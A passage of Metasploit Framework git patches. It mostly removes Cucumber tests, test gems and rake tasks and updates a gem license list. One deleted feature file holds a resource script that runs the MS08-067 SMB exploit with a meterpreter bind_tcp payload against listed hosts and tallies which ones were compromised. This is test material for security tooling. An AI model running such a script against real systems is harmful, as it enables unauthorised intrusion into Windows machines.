@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Auxiliary def on_request_exploit(cli, req, target_info) print_target_info(cli, target_info) - send_not_found(cli) + send_response(cli, '') end def run From dbef4ee816c8f49df850215c66b105e21e44b08f Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 12 Jul 2017 08:00:29 -0500 Subject: [PATCH 23/63] kill cucumber in framework --- .travis.yml | 2 - Gemfile | 8 - Gemfile.lock | 48 ------ LICENSE_GEMS | 79 +++++---- features/commands/help.feature | 111 ------------- .../exploit/smb/ms08_067_netapi.feature | 48 ------ features/msfconsole/database_yml.feature | 153 ------------------ .../step_definitions/environment_variables.rb | 20 --- features/step_definitions/project.rb | 14 -- features/support/bin/stty | 26 --- features/support/env.rb | 34 ---- features/support/hooks.rb | 39 ----- features/support/simplecov_setup.rb | 16 -- features/support/stty.rb | 11 -- features/support/targets.yml.example | 7 - lib/metasploit/framework/database/cucumber.rb | 36 ----- lib/tasks/cucumber.rake | 74 --------- lib/tasks/custom_cucumber.rake | 30 ---- script/cucumber | 10 -- 19 files changed, 37 insertions(+), 729 deletions(-) delete mode 100644 features/commands/help.feature delete mode 100644 features/modules/exploit/smb/ms08_067_netapi.feature delete mode 100644 features/msfconsole/database_yml.feature delete mode 100644 features/step_definitions/environment_variables.rb delete mode 100644 features/step_definitions/project.rb delete mode 100755 features/support/bin/stty delete mode 100644 features/support/env.rb delete mode 100644 features/support/hooks.rb delete mode 100644 features/support/simplecov_setup.rb delete mode 100644 features/support/stty.rb delete mode 100644 features/support/targets.yml.example delete mode 100644 lib/metasploit/framework/database/cucumber.rb delete mode 100644 lib/tasks/cucumber.rake delete mode 100644 lib/tasks/custom_cucumber.rake delete mode 100755 script/cucumber 
diff --git a/.travis.yml b/.travis.yml index b6894b2597..28f0b510f7 100644 --- a/.travis.yml +++ b/.travis.yml @@ -16,8 +16,6 @@ rvm: - '2.4.1' env: -# TODO: restore these tests when the code passes them! -# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"' diff --git a/Gemfile b/Gemfile index 09fe9ccc85..4dbdbacb6d 100755 --- a/Gemfile +++ b/Gemfile @@ -37,14 +37,6 @@ group :development, :test do end group :test do - # cucumber extension for testing command line applications, like msfconsole - gem 'aruba' - # cucumber + automatic database cleaning with database_cleaner - gem 'cucumber-rails', :require => false - gem 'shoulda-matchers' # Manipulate Time.now in specs gem 'timecop' - # Needed to work around a regression between capybara 2.7.1 and xpath 2.1 - # XXX remove when capybara is updated to work with xpath 2.1 - gem 'xpath', '2.0' end diff --git a/Gemfile.lock b/Gemfile.lock index 7ae575d049..6da285dbd2 100644 --- a/Gemfile.lock +++ b/Gemfile.lock 
@@ -102,46 +102,12 @@ GEM arel (6.0.4) arel-helpers (2.4.0) activerecord (>= 3.1.0, < 6) - aruba (0.14.2) - childprocess (~> 0.5.6) - contracts (~> 0.9) - cucumber (>= 1.3.19) - ffi (~> 1.9.10) - rspec-expectations (>= 2.99) - thor (~> 0.19) backports (3.8.0) bcrypt (3.1.11) bindata (2.4.0) bit-struct (0.16) builder (3.2.3) - capybara (2.14.4) - addressable - mime-types (>= 1.16) - nokogiri (>= 1.3.3) - rack (>= 1.0.0) - rack-test (>= 0.5.4) - xpath (~> 2.0) - childprocess (0.5.9) - ffi (~> 1.0, >= 1.0.11) coderay (1.1.1) - contracts (0.16.0) - cucumber (2.4.0) - builder (>= 2.1.2) - cucumber-core (~> 1.5.0) - cucumber-wire (~> 0.0.1) - diff-lcs (>= 1.1.3) - gherkin (~> 4.0) - multi_json (>= 1.7.5, < 2.0) - multi_test (>= 0.1.2) - cucumber-core (1.5.0) - gherkin (~> 4.0) - cucumber-rails (1.5.0) - capybara (>= 1.1.2, < 3) - cucumber (>= 1.3.8, < 4) - mime-types (>= 1.17, < 4) - nokogiri (~> 1.5) - railties (>= 4, < 5.2) - cucumber-wire (0.0.1) diff-lcs (1.3) dnsruby (1.60.1) docile (1.1.5) @@ -153,10 +119,8 @@ GEM railties (>= 3.0.0) faraday (0.12.1) multipart-post (>= 1.2, < 3) - ffi (1.9.18) filesize (0.1.1) fivemat (1.3.5) - gherkin (4.1.3) google-protobuf (3.3.0) googleauth (0.5.1) faraday (~> 0.9) @@ -216,14 +180,10 @@ GEM recog (~> 2.0) metasploit_payloads-mettle (0.1.10) method_source (0.8.2) - mime-types (3.1) - mime-types-data (~> 3.2015) - mime-types-data (3.2016.0521) mini_portile2 (2.2.0) minitest (5.10.2) msgpack (1.1.0) multi_json (1.12.1) - multi_test (0.1.2) multipart-post (2.0.0) nessus_rest (0.1.6) net-ssh (4.1.0) @@ -358,8 +318,6 @@ GEM sawyer (0.8.1) addressable (>= 2.3.5, < 2.6) faraday (~> 0.8, < 1.0) - shoulda-matchers (3.1.1) - activesupport (>= 4.0.0) signet (0.7.3) addressable (~> 2.3) faraday (~> 0.9) @@ -386,16 +344,12 @@ GEM activemodel (>= 4.2.7) activesupport (>= 4.2.7) xmlrpc (0.3.0) - xpath (2.0.0) - nokogiri (~> 1.3) yard (0.9.9) PLATFORMS ruby DEPENDENCIES - aruba - cucumber-rails factory_girl_rails fivemat metasploit-aggregator 
@@ -406,10 +360,8 @@ DEPENDENCIES redcarpet rspec-rails rspec-rerun - shoulda-matchers simplecov timecop - xpath (= 2.0) yard BUNDLED WITH diff --git a/LICENSE_GEMS b/LICENSE_GEMS index a4e325a2cf..2fe90885c5 100644 --- a/LICENSE_GEMS +++ b/LICENSE_GEMS 
@@ -1,71 +1,62 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh -actionpack, 4.2.8, MIT -actionview, 4.2.8, MIT -activemodel, 4.2.8, MIT -activerecord, 4.2.8, MIT -activesupport, 4.2.8, MIT +Ascii85, 1.0.2, MIT +actionpack, 4.2.9, MIT +actionview, 4.2.9, MIT +activemodel, 4.2.9, MIT +activerecord, 4.2.9, MIT +activesupport, 4.2.9, MIT addressable, 2.5.1, "Apache 2.0" +afm, 0.2.2, MIT arel, 6.0.4, MIT arel-helpers, 2.4.0, unknown -aruba, 0.14.2, MIT backports, 3.8.0, MIT bcrypt, 3.1.11, MIT bindata, 2.4.0, ruby bit-struct, 0.16, ruby builder, 3.2.3, MIT -bundler, 1.15.0, MIT -capybara, 2.14.0, MIT -childprocess, 0.5.9, MIT +bundler, 1.15.1, MIT coderay, 1.1.1, MIT -contracts, 0.16.0, "Simplified BSD" -cucumber, 2.4.0, MIT -cucumber-core, 1.5.0, MIT -cucumber-rails, 1.5.0, MIT -cucumber-wire, 0.0.1, MIT diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+" +dnsruby, 1.60.1, "Apache 2.0" docile, 1.1.5, MIT erubis, 2.7.0, MIT factory_girl, 4.8.0, MIT factory_girl_rails, 4.8.0, MIT faraday, 0.12.1, MIT -ffi, 1.9.18, "New BSD" filesize, 0.1.1, MIT -fivemat, 1.3.3, MIT -gherkin, 4.1.3, MIT +fivemat, 1.3.5, MIT google-protobuf, 3.3.0, "New BSD" googleauth, 0.5.1, "Apache 2.0" -grpc, 1.3.4, "New BSD" -i18n, 0.8.1, MIT +grpc, 1.4.1, "New BSD" +hashery, 2.1.2, "Simplified BSD" +i18n, 0.8.6, MIT jsobfu, 0.4.2, "New BSD" json, 2.1.0, ruby jwt, 1.5.6, MIT little-plugger, 1.1.4, MIT logging, 2.2.2, MIT loofah, 2.0.3, MIT -memoist, 0.15.0, MIT +memoist, 0.16.0, MIT metasm, 1.0.3, LGPL metasploit-aggregator, 0.2.1, "New BSD" -metasploit-concern, 2.0.4, "New BSD" -metasploit-credential, 2.0.9, "New BSD" -metasploit-framework, 4.14.23, "New BSD" +metasploit-concern, 2.0.5, "New BSD" +metasploit-credential, 2.0.10, "New BSD" +metasploit-framework, 4.15.0, "New BSD" metasploit-model, 2.0.4, "New BSD" -metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD" -metasploit_data_models, 2.0.14, "New BSD" -metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD" 
+metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD" +metasploit_data_models, 2.0.15, "New BSD" +metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD" method_source, 0.8.2, MIT -mime-types, 3.1, MIT -mime-types-data, 3.2016.0521, MIT -mini_portile2, 2.1.0, MIT +mini_portile2, 2.2.0, MIT minitest, 5.10.2, MIT msgpack, 1.1.0, "Apache 2.0" multi_json, 1.12.1, MIT -multi_test, 0.1.2, MIT multipart-post, 2.0.0, MIT nessus_rest, 0.1.6, MIT net-ssh, 4.1.0, MIT network_interface, 0.0.1, MIT -nexpose, 6.0.0, BSD -nokogiri, 1.7.2, MIT +nexpose, 6.1.0, BSD +nokogiri, 1.8.0, MIT octokit, 4.7.0, MIT openssl-ccm, 1.2.1, MIT openvas-omp, 0.0.4, MIT @@ -73,6 +64,7 @@ os, 0.9.6, MIT packetfu, 1.1.13, BSD patch_finder, 1.0.2, "New BSD" pcaprub, 0.12.4, LGPL-2.1 +pdf-reader, 2.0.0, MIT pg, 0.20.0, "New BSD" pg_array_parser, 0.0.9, unknown postgres_ext, 3.0.0, MIT @@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT rails-deprecated_sanitizer, 1.0.3, MIT rails-dom-testing, 1.0.8, MIT rails-html-sanitizer, 1.0.3, MIT -railties, 4.2.8, MIT +railties, 4.2.9, MIT rake, 12.0.0, MIT rb-readline, 0.5.4, BSD -recog, 2.1.8, unknown +recog, 2.1.11, unknown redcarpet, 3.4.0, MIT -rex-arch, 0.1.4, "New BSD" -rex-bin_tools, 0.1.3, "New BSD" -rex-core, 0.1.10, "New BSD" +rex-arch, 0.1.9, "New BSD" +rex-bin_tools, 0.1.4, "New BSD" +rex-core, 0.1.11, "New BSD" rex-encoder, 0.1.4, "New BSD" rex-exploitation, 0.1.14, "New BSD" rex-java, 0.1.5, "New BSD" 
@@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD" rex-random_identifier, 0.1.2, "New BSD" rex-registry, 0.1.3, "New BSD" rex-rop_builder, 0.1.3, "New BSD" -rex-socket, 0.1.6, "New BSD" +rex-socket, 0.1.8, "New BSD" rex-sslscan, 0.1.4, "New BSD" rex-struct2, 0.1.2, "New BSD" rex-text, 0.2.15, "New BSD" rex-zip, 0.1.3, "New BSD" rkelly-remix, 0.0.7, MIT robots, 0.10.1, MIT +rspec, 3.6.0, MIT rspec-core, 3.6.0, MIT rspec-expectations, 3.6.0, MIT rspec-mocks, 3.6.0, MIT rspec-rails, 3.6.0, MIT +rspec-rerun, 1.1.0, MIT rspec-support, 3.6.0, MIT -ruby_smb, 0.0.17, "New BSD" +ruby-rc4, 0.1.5, MIT +ruby_smb, 0.0.18, "New BSD" rubyntlm, 0.6.2, MIT rubyzip, 1.2.1, "Simplified BSD" sawyer, 0.8.1, MIT -shoulda-matchers, 3.1.1, MIT signet, 0.7.3, "Apache 2.0" simplecov, 0.14.1, MIT simplecov-html, 0.10.1, MIT @@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD" sshkey, 1.9.0, MIT thor, 0.19.4, MIT thread_safe, 0.3.6, "Apache 2.0" -timecop, 0.8.1, MIT +timecop, 0.9.1, MIT +ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0" tzinfo, 1.2.3, MIT tzinfo-data, 1.2017.2, MIT windows_error, 0.1.2, BSD +xdr, 2.0.0, "Apache 2.0" xmlrpc, 0.3.0, ruby -xpath, 2.1.0, MIT yard, 0.9.9, MIT diff --git a/features/commands/help.feature b/features/commands/help.feature deleted file mode 100644 index f73763436b..0000000000 --- a/features/commands/help.feature +++ /dev/null 
@@ -1,111 +0,0 @@ -Feature: Help command - - Background: - Given I run `msfconsole --defer-module-loads -q -x help -x exit` - - Scenario: The 'help' command's output - Then the output should contain: - """ - Core Commands - ============= - - Command Description - ------- ----------- - ? Help menu - banner Display an awesome metasploit banner - cd Change the current working directory - color Toggle color - connect Communicate with a host - exit Exit the console - get Gets the value of a context-specific variable - getg Gets the value of a global variable - grep Grep the output of another command - help Help menu - history Show command history - irb Drop into irb scripting mode - load Load a framework plugin - quit Exit the console - route Route traffic through a session - save Saves the active datastores - sessions Dump session listings and display information about sessions - set Sets a context-specific variable to a value - setg Sets a global variable to a value - sleep Do nothing for the specified number of seconds - spool Write console output into a file as well the screen - threads View and manipulate background threads - unload Unload a framework plugin - unset Unsets one or more context-specific variables - unsetg Unsets one or more global variables - version Show the framework and console library version numbers - - - Module Commands - =============== - - Command Description - ------- ----------- - advanced Displays advanced options for one or more modules - back Move back from the current context - edit Edit the current module with the preferred editor - info Displays information about one or more modules - loadpath Searches for and loads modules from a path - options Displays global options or for one or more modules - popm Pops the latest module off the stack and makes it active - previous Sets the previously loaded module as the current module - pushm Pushes the active or list of modules onto the module stack - reload_all Reloads all modules from all 
defined module paths - search Searches module names and descriptions - show Displays modules of a given type, or all modules - use Selects a module by name - - - Job Commands - ============ - - Command Description - ------- ----------- - handler Start a payload handler as job - jobs Displays and manages jobs - kill Kill a job - rename_job Rename a job - - - Resource Script Commands - ======================== - - Command Description - ------- ----------- - makerc Save commands entered since start to a file - resource Run the commands stored in a file - - - Database Backend Commands - ========================= - - Command Description - ------- ----------- - db_connect Connect to an existing database - db_disconnect Disconnect from the current database instance - db_export Export a file containing the contents of the database - db_import Import a scan result file (filetype will be auto-detected) - db_nmap Executes nmap and records the output automatically - db_rebuild_cache Rebuilds the database-stored module cache - db_status Show the current database status - hosts List all hosts in the database - loot List all loot in the database - notes List all notes in the database - services List all services in the database - vulns List all vulnerabilities in the database - workspace Switch between database workspaces - - - Credentials Backend Commands - ============================ - - Command Description - ------- ----------- - creds List all credentials in the database - - - """ - diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature deleted file mode 100644 index 940ff2a4e6..0000000000 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ /dev/null 
@@ -1,48 +0,0 @@ -@targets @db -Feature: MS08-067 netapi - - Background: - Given a directory named "home" - And I cd to "home" - And a mocked home directory - - Scenario: The MS08-067 should get a session with bind_tcp - Given I ready the windows targets - Given a file named "ms08-067-bind.rc" with: - """ - - self.run_single("spool #{Rails.root.join('tmp', 'console.log')}") - hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') - payload_name = 'windows/meterpreter/bind_tcp' - exploited_hosts = [] - failed_hosts = [] - - hosts.each do |host| - print_status("Trying MS08-067 against #{host['ipAddress']}") - mod = framework.exploits.create('windows/smb/ms08_067_netapi') - mod.datastore['PAYLOAD'] = payload_name - mod.datastore['RHOST'] = host['ipAddress'] - m = mod.exploit_simple( - 'LocalInput' => nil, - 'LocalOutput' => nil, - 'Payload' => payload_name, - 'RunAsJob' => false - ) - - sleep(1) - - if m - exploited_hosts << host['ipAddress'] - else - failed_hosts << host['ipAddress'] - end - end - - print_status("Exploited hosts: #{exploited_hosts.inspect}") - print_status("Failed hosts: #{failed_hosts.inspect}") - self.run_single('sessions -K') - - """ - When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds - Then the 'Mdm::Host' table contains the expected targets - \ No newline at end of file diff --git a/features/msfconsole/database_yml.feature b/features/msfconsole/database_yml.feature deleted file mode 100644 index f2b40c213b..0000000000 --- a/features/msfconsole/database_yml.feature +++ /dev/null 
@@ -1,153 +0,0 @@ -@boot -Feature: `msfconsole` `database.yml` - - In order to connect to the database in `msfconsole` - As a user calling `msfconsole` from a terminal - I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence): - - 1. An explicit argument to the `-y` flag to `msfconsole` - 2. The MSF_DATABASE_CONFIG environment variable - 3. The user's `~/.msf4/database.yml` - 4. `config/database.yml` in the metasploit-framework checkout location. - - Scenario: With all 4 locations, --yaml wins - Given a file named "command_line.yml" with: - """ - test: - adapter: postgresql - database: command_line_metasploit_framework_test - username: command_line_metasploit_framework_test - """ - And a file named "msf_database_config.yml" with: - """ - test: - adapter: postgresql - database: environment_metasploit_framework_test - username: environment_metasploit_framework_test - """ - And I set the environment variables to: - | variable | value | - | MSF_DATABASE_CONFIG | msf_database_config.yml | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And a directory named ".msf4" - And I cd to ".msf4" - And a file named "database.yml" with: - """ - test: - adapter: postgresql - database: user_metasploit_framework_test - username: user_metasploit_framework_test - """ - And I cd to "../.." 
- And the project "database.yml" exists with: - """ - test: - adapter: postgresql - database: project_metasploit_framework_test - username: project_metasploit_framework_test - """ - When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml` - Then the output should contain "command_line_metasploit_framework_test" - - Scenario: Without --yaml, MSF_DATABASE_CONFIG wins - Given a file named "msf_database_config.yml" with: - """ - test: - adapter: postgresql - database: environment_metasploit_framework_test - username: environment_metasploit_framework_test - """ - And I set the environment variables to: - | variable | value | - | MSF_DATABASE_CONFIG | msf_database_config.yml | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And a directory named ".msf4" - And I cd to ".msf4" - And a file named "database.yml" with: - """ - test: - adapter: postgresql - database: user_metasploit_framework_test - username: user_metasploit_framework_test - """ - And I cd to "../.." - And the project "database.yml" exists with: - """ - test: - adapter: postgresql - database: project_metasploit_framework_test - username: project_metasploit_framework_test - """ - When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit` - Then the output should contain "environment_metasploit_framework_test" - - Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins - Given I unset the environment variables: - | variable | - | MSF_DATABASE_CONFIG | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And a directory named ".msf4" - And I cd to ".msf4" - And a file named "database.yml" with: - """ - test: - adapter: postgresql - database: user_metasploit_framework_test - username: user_metasploit_framework_test - """ - And I cd to "../.." 
- And the project "database.yml" exists with: - """ - test: - adapter: postgresql - database: project_metasploit_framework_test - username: project_metasploit_framework_test - """ - When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit` - Then the output should contain "user_metasploit_framework_test" - - Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins - Given I unset the environment variables: - | variable | - | MSF_DATABASE_CONFIG | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And I cd to "../.." - And the project "database.yml" exists with: - """ - test: - adapter: postgresql - database: project_metasploit_framework_test - username: project_metasploit_framework_test - """ - When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit` - Then the output should contain "project_metasploit_framework_test" - - - Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection - Given I unset the environment variables: - | variable | - | MSF_DATABASE_CONFIG | - And a directory named "home" - And I cd to "home" - And a mocked home directory - And I cd to "../.." 
- And the project "database.yml" does not exist - When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit` - Then the output should not contain "command_line_metasploit_framework_test" - And the output should not contain "environment_metasploit_framework_test" - And the output should not contain "user_metasploit_framework_test" - And the output should not contain "project_metasploit_framework_test" - And the output should contain "[*] postgresql selected, no connection" - - Scenario: Starting `msfconsole` with a valid database.yml - When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit` - Then the output should contain "[*] postgresql connected to metasploit_framework_test" - diff --git a/features/step_definitions/environment_variables.rb b/features/step_definitions/environment_variables.rb deleted file mode 100644 index c554ca0264..0000000000 --- a/features/step_definitions/environment_variables.rb +++ /dev/null @@ -1,20 +0,0 @@ -Given /^I unset the environment variables:$/ do |table| - table.hashes.each do |row| - variable = row['variable'].to_s.upcase - - # @todo add extension to Announcer - announcer.instance_eval do - if @options[:env] - print "$ unset #{variable}" - end - end - - current_value = ENV.delete(variable) - - # if original_env already has the key, then the true original was already recorded from a previous unset or set, - # so don't record the current value as it will cause ENV not to be restored after the Scenario. - unless original_env.key? variable - original_env[variable] = current_value - end - end -end \ No newline at end of file diff --git a/features/step_definitions/project.rb b/features/step_definitions/project.rb deleted file mode 100644 index 1c24f07254..0000000000 --- a/features/step_definitions/project.rb +++ /dev/null 
@@ -1,14 +0,0 @@ -require 'metasploit/framework/database/cucumber' - -Given /^the project "database.yml" does not exist$/ do - Metasploit::Framework::Database::Cucumber.backup_project_configurations -end - -Given /^the project "database.yml" exists with:$/ do |file_content| - Metasploit::Framework::Database::Cucumber.backup_project_configurations - File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) } -end - -After do - Metasploit::Framework::Database::Cucumber.restore_project_configurations -end \ No newline at end of file diff --git a/features/support/bin/stty b/features/support/bin/stty deleted file mode 100755 index 8ff68bb1c5..0000000000 --- a/features/support/bin/stty +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env ruby - -case ARGV[0] - when 'size' - puts "30 134" - when '-a' - puts <; - eol2 = ; erase = ^?; intr = ^C; kill = ^U; lnext = ^V; - min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T; - stop = ^S; susp = ^Z; time = 0; werase = ^W; -EOS - when '-g' - puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400" -end - -exit 0 diff --git a/features/support/env.rb b/features/support/env.rb deleted file mode 100644 index 6d186f405f..0000000000 --- a/features/support/env.rb +++ /dev/null 
@@ -1,34 +0,0 @@ -# @note `require 'simplecov'` is not used here because all features currently use external `msfconsole` process, so only -# that child process needs to load 'simplecov'. - -# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril. -# It is recommended to regenerate this file in the future when you upgrade to a -# newer version of cucumber-rails. Consider adding your own code to a new file -# instead of editing this one. Cucumber will automatically load all features/**/*.rb -# files. - -require 'cucumber/rails' -require 'aruba/cucumber' - -# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In -# order to ease the transition to Capybara we set the default here. If you'd -# prefer to use XPath just remove this line and adjust any selectors in your -# steps to use the XPath syntax. -Capybara.default_selector = :css - -# By default, any exception happening in your Rails application will bubble up -# to Cucumber so that your scenario will fail. This is a different from how -# your application behaves in the production environment, where an error page will -# be rendered instead. -# -# Sometimes we want to override this default behaviour and allow Rails to rescue -# exceptions and display an error page (just like when the app is running in production). -# Typical scenarios where you want to do this is when you test your error pages. -# There are two ways to allow Rails to rescue exceptions: -# -# 1) Tag your scenario (or feature) with @allow-rescue -# -# 2) Set the value below to true. Beware that doing this globally is not -# recommended as it will mask a lot of errors for you! -# -ActionController::Base.allow_rescue = false diff --git a/features/support/hooks.rb b/features/support/hooks.rb deleted file mode 100644 index 16c5973ef2..0000000000 --- a/features/support/hooks.rb +++ /dev/null 
@@ -1,39 +0,0 @@ -Before do - set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first) - set_env('RAILS_ENV', 'test') - @aruba_timeout_seconds = 8.minutes -end - -Before('@db') do |scenario| - dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname)) - ActiveRecord::Base.establish_connection(dbconfig["test"]) -end - -# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed -# unless Bundler.settings.without.include?(:coverage) -# Before do |scenario| -# command_name = case scenario -# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline -# "#{scenario.feature.title} #{scenario.name}" -# when Cucumber::Ast::OutlineTable::ExampleRow -# scenario_outline = scenario.scenario_outline -# -# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}" -# else -# raise TypeError, "Don't know how to extract command name from #{scenario.class}" -# end -# -# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead -# # of overwriting each other as 'Cucumber Features' -# set_env('SIMPLECOV_COMMAND_NAME', command_name) -# -# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup') -# # set environment variable so child processes will merge their coverage data with parent process's coverage data. -# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}") -# end -# -# Before('@db') do |scenario| -# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname)) -# ActiveRecord::Base.establish_connection(dbconfig["test"]) -# end -# end diff --git a/features/support/simplecov_setup.rb b/features/support/simplecov_setup.rb deleted file mode 100644 index 78cc264fc3..0000000000 --- a/features/support/simplecov_setup.rb +++ /dev/null 
@@ -1,16 +0,0 @@ -# @note this file is loaded in env.rb to setup simplecov using RUBYOPTs for child processes - -simplecov_command_name = ENV['SIMPLECOV_COMMAND_NAME'] - -# will not be set if hook does not run because `bundle install --without coverage` -if simplecov_command_name - require 'simplecov' - - require 'pathname' - - root = Pathname(__FILE__).expand_path.parent.parent.parent - - SimpleCov.command_name(simplecov_command_name) - SimpleCov.root(root) - load root.join('.simplecov') -end diff --git a/features/support/stty.rb b/features/support/stty.rb deleted file mode 100644 index a8afb704c4..0000000000 --- a/features/support/stty.rb +++ /dev/null @@ -1,11 +0,0 @@ -require 'pathname' - -support = Pathname.new(__FILE__).realpath.parent - -paths = [ - # adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty - # output. - support.join('bin').to_path, - ENV['PATH'] -] -ENV['PATH'] = paths.join(File::PATH_SEPARATOR) diff --git a/features/support/targets.yml.example b/features/support/targets.yml.example deleted file mode 100644 index 0752a6cc7e..0000000000 --- a/features/support/targets.yml.example +++ /dev/null @@ -1,7 +0,0 @@ -windows: - - - hostname: wxpsp0 - ip: 127.0.0.100 - - - hostname: wxpsp2 - ip: 127.0.0.101 diff --git a/lib/metasploit/framework/database/cucumber.rb b/lib/metasploit/framework/database/cucumber.rb deleted file mode 100644 index 562504c88b..0000000000 --- a/lib/metasploit/framework/database/cucumber.rb +++ /dev/null 
@@ -1,36 +0,0 @@ -require 'metasploit/framework/database' - -module Metasploit::Framework::Database::Cucumber - def self.project_configurations_path - Rails.root.join('config', 'database.yml').to_path - end - - def self.backup_project_configurations - if File.exist?(project_configurations_path) - # assume that the backup file is from a previously aborted run and it contains the real database.yml data, so - # just delete the fake database.yml and the After hook will restore the real database.yml from the backup location - if File.exist?(backup_project_configurations_path) - File.delete(project_configurations_path) - else - # project contains the real database.yml and there was no previous, aborted run. - File.rename(project_configurations_path, backup_project_configurations_path) - end - end - end - - def self.backup_project_configurations_path - "#{project_configurations_path}.cucumber.bak" - end - - def self.restore_project_configurations - if File.exist?(backup_project_configurations_path) - if File.exist?(project_configurations_path) - # Remove fake, leftover database.yml - File.delete(project_configurations_path) - end - - File.rename(backup_project_configurations_path, project_configurations_path) - end - end -end - diff --git a/lib/tasks/cucumber.rake b/lib/tasks/cucumber.rake deleted file mode 100644 index ff424fa7b0..0000000000 --- a/lib/tasks/cucumber.rake +++ /dev/null 
@@ -1,74 +0,0 @@ -# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril. -# It is recommended to regenerate this file in the future when you upgrade to a -# newer version of cucumber-rails. Consider adding your own code to a new file -# instead of editing this one. Cucumber will automatically load all features/**/*.rb -# files. - - -unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks - -vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first -$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil? - -begin - require 'cucumber/rake/task' - - namespace :cucumber do - Cucumber::Rake::Task.new({:ok => 'db:test:prepare'}, 'Run features that should pass') do |t| - t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. - t.fork = true # You may get faster startup if you set this to false - t.profile = 'default' - end - - Cucumber::Rake::Task.new({:wip => 'db:test:prepare'}, 'Run features that are being worked on') do |t| - t.binary = vendored_cucumber_bin - t.fork = true # You may get faster startup if you set this to false - t.profile = 'wip' - end - - Cucumber::Rake::Task.new({:rerun => 'db:test:prepare'}, 'Record failing features and run only them if any exist') do |t| - t.binary = vendored_cucumber_bin - t.fork = true # You may get faster startup if you set this to false - t.profile = 'rerun' - end - - desc 'Run all features' - task :all => [:ok, :wip] - - task :statsetup do - require 'rails/code_statistics' - ::STATS_DIRECTORIES << %w(Cucumber\ features features) if File.exist?('features') - ::CodeStatistics::TEST_TYPES << "Cucumber features" if File.exist?('features') - end - end - desc 'Alias for cucumber:ok' - task :cucumber => 'cucumber:ok' - - task :default => :cucumber - - task :features => :cucumber do - STDERR.puts "*** The 'features' task is deprecated. 
See rake -T cucumber ***" - end - - # In case we don't have ActiveRecord, append a no-op task that we can depend upon. - task 'db:test:prepare' do - end - - task 'db:config:restore' do - require 'metasploit/framework/database/cucumber' - Metasploit::Framework::Database::Cucumber.restore_project_configurations - end - - # Restore the config/database.yml from config/database.cucumber.yml before attempting to copy development to test - # database in order to recover from interrupted cucumber runs - task 'environment' => 'db:config:restore' - - task :stats => 'cucumber:statsetup' -rescue LoadError - desc 'cucumber rake task not available (cucumber not installed)' - task :cucumber do - abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin' - end -end - -end diff --git a/lib/tasks/custom_cucumber.rake b/lib/tasks/custom_cucumber.rake deleted file mode 100644 index 9b8c3fb8ae..0000000000 --- a/lib/tasks/custom_cucumber.rake +++ /dev/null 
